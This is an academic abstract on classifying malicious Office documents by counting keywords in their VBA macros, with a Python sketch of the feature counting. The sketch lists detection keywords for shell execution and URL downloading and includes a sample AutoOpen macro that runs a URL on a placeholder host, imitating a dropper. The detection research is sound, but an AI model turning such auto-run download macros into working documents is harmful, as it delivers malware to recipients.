http://dx.doi.org/10.9708/jksci.2022.27.05.149

OLE File Analysis and Malware Detection using Machine Learning  

Choi, Hyeong Kyu (Dept. of Information Security, Pai Chai University)
Kang, Ah Reum (Dept. of Information Security, Pai Chai University)
Abstract
Recently, there have been many reports of document-type malware that injects malicious code into Microsoft Office files. Such malware often hides its payload by encoding it within the document, so it can easily bypass anti-virus programs. We found that malicious code was inserted into Visual Basic for Applications (VBA) macros, a feature supported by Microsoft Office. We identified malicious code such as shellcode that runs external programs and URL-related code that downloads files from external URLs. We selected 354 keywords that appear repeatedly in malicious Microsoft Office files and defined the number of times each keyword appears in the body of the document as a feature. We then trained SVM, naïve Bayes, logistic regression, and random forest classifiers on these features; they achieved accuracies of 0.994, 0.659, 0.995, and 0.998, respectively.
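To make the feature definition concrete, the following minimal Python sketch counts how often each keyword occurs in a piece of macro text. It is illustrative only: the five keywords, the sample macro, and the function name `keyword_counts` are hypothetical (the abstract does not list the 354 keywords), and case-insensitive substring matching is an assumption rather than the authors' documented procedure. Extracting the text from an OLE file is not shown.

```python
# Hypothetical keyword list; the paper's actual 354 keywords are not given in the abstract.
KEYWORDS = ["Shell", "CreateObject", "URLDownloadToFile", "http", "AutoOpen"]


def keyword_counts(text, keywords=KEYWORDS):
    """Return one feature per keyword: its number of occurrences in `text`.

    Matching is case-insensitive and counts non-overlapping substrings,
    which is an assumption made for this sketch.
    """
    lowered = text.lower()
    return [lowered.count(keyword.lower()) for keyword in keywords]


# Hypothetical macro body standing in for text extracted from a document.
sample = (
    "Sub AutoOpen()\n"
    '  Set o = CreateObject("WScript.Shell")\n'
    '  o.Run "http://example.invalid/a.exe"\n'
    "End Sub"
)

features = keyword_counts(sample)
print(features)
```

Each document then becomes a fixed-length vector of counts (354 entries in the paper, 5 here), which is the kind of input that classifiers such as SVM, naïve Bayes, logistic regression, and random forest accept.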
Keywords
OLE; malware; Microsoft Office; shellcode; VBA macro; random forest